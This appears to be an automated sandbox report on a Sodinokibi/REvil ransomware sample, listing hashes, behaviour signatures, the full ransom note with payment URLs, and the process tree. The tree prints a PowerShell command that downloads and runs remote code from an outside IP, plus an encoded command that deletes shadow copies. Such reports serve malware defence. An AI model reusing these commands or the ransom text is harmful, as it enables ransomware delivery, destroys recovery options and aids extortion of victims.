Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v191014
  • submitted
    11-02-2020 18:10

General

  • Target

    61qVyZCf.bat

  • Size

    189B

  • MD5

    b333d94ab42b4326dd0fd88ed1478a68

  • SHA1

    25f722c04783237a8195b64d6c08ea787991c6eb

  • SHA256

    ece31cd5ba841084557b618766ee4ec4e36796d0ece6191574a8eb615e01e909

  • SHA512

    1cfd9d628a71c3a6558ba135ad295db79c8dec2bbbc438a6a8a0c2cae5465aaa74fccfcc14a1b62cc17f443f6400750a4eba200e2b2ce170a031941b412be2b0

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/61qVyZCf

Extracted

Path

C:\8q88jx-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 8q88jx. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E27DC6532B1C89E1 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/E27DC6532B1C89E1 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 23YRX/ofsIe2PD4dvdHmYPuk9Rsl0YulGTmarMLmX2J8fkfOJnHp97yt623LXQS8 7MpwVnJHcw7lmDrfGhKQFVhFvav80j+PJ3lcNMxNjLWkLkRMMg1GA4f8hBrA15AP fC2eleh531vo0MCIHvPQsQa884gcJUGj22lKN7tIlaA3UZktsKQoOdD+07HN+sdj XkIESE9F4qNaxBpmMyE13aKFcL2UWfS9NcokpxnHTI1XZEDoAYx9Q3meoKXjT5xj FXumdBO5yUiw0AhGtK/y7bRLe77qkPB7yptx2kuXScR+zCRM+IfOXzN95BgNWTgR mjlwFPGZDfJtMMT8qA2Y/8dD6PWgM6XK8Zu0NKThSJB3q7A9N51NcrfKfpR6zRTQ 2qT8ubsl4buMChIWIVoWHGUfWUQN8Tk+LEfvzc2q669DcJCkg+d97V59zHZx7gJ0 exNJMwxqgFL4c/ll7oqyO4i6fJYDeBlCp3NiRWdcMidp/fPdDmzfIE0cEk5js2J5 JmT1UFnKzic5QWLyYpmE+dxBn+2hgZJs0RJF+YKXZLGj1dd2D3zaw0z+8f/lUFTe CO2FurWt4X1rty++VBqP/rx4yl8GiOzrHOkc3u2NbAZZ+ve/5xANwmc+DF+FJyww 2yrC/OWzS9VegoNQWgJ3B/TKncdR+CHp1ZFRVDESUM4mxKmi08NZa1KeaspnbKN2 FR2WcI7plTrbwtmVzqCxzgFIL9M6mh/cCOKA5aHwHHzysghrlF5FNBza0oB8xpuc inNSSDOl87xC8WkiewBp5K+8QAjUK7t5vS5PtPAJ66Yen4OD+FZJKk4Bdb/VOXww vQoz9ZUrNMGJdNzY7geztDrqhcqXqrnMadLucGPGi4wueMXse0aoDX5Jt0sxX5ka uA4PhmEkfKq9bMWE207DbDSak7Qa40Rwb2HoDhqi7Z37ZYF4fVokJT8nNqyd1A/v rw3ASMp6PjWjSYXrPZy5Sckr8ma6oQY4u5ITv4mvwPHKO0Q2Rwxvb99B0+tomBC4 L2r4j4NjH4/hIlHen5lGwVEOGpAoIrKlUSTc8eqCiQ2vq49TBFQ0WpgvFSU1McR/ lkiuHdHA5wJgqS1QNyiLypSoY6VlAi6a3CeOye9VsEXfFrt66sZ3fMGqafAPmj6n shsRoSZ7TVaiVs6k ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E27DC6532B1C89E1

http://decryptor.cc/E27DC6532B1C89E1

Signatures

  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
  • Drops file in Program Files directory 33 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Blacklisted process makes network request 71 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality

  • Discovering connected drives 3 TTPs 7 IoCs
  • Modifies service 2 TTPs 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\61qVyZCf.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:284
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/61qVyZCf');Invoke-IGMVZY;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Modifies system certificate store
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      • Drops file in System32 directory
      • Discovering connected drives
      PID:272
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Discovering connected drives
        PID:748
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1984

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4628e689-d195-4873-bc54-2194d7d68777

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_512b5fbe-a222-4c41-85f8-7f61ee5ca5bd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c6be20a0-2b44-41e6-b03e-788e1380648b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c85534f7-abc2-478b-a265-18e03f17967d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb154db7-5347-459d-a5ae-f27e0827e401

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef13c2a6-fcdf-474f-b686-be9a419bd5e9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

  • memory/272-2-0x0000000005FB0000-0x0000000005FB2000-memory.dmp

    Filesize

    8KB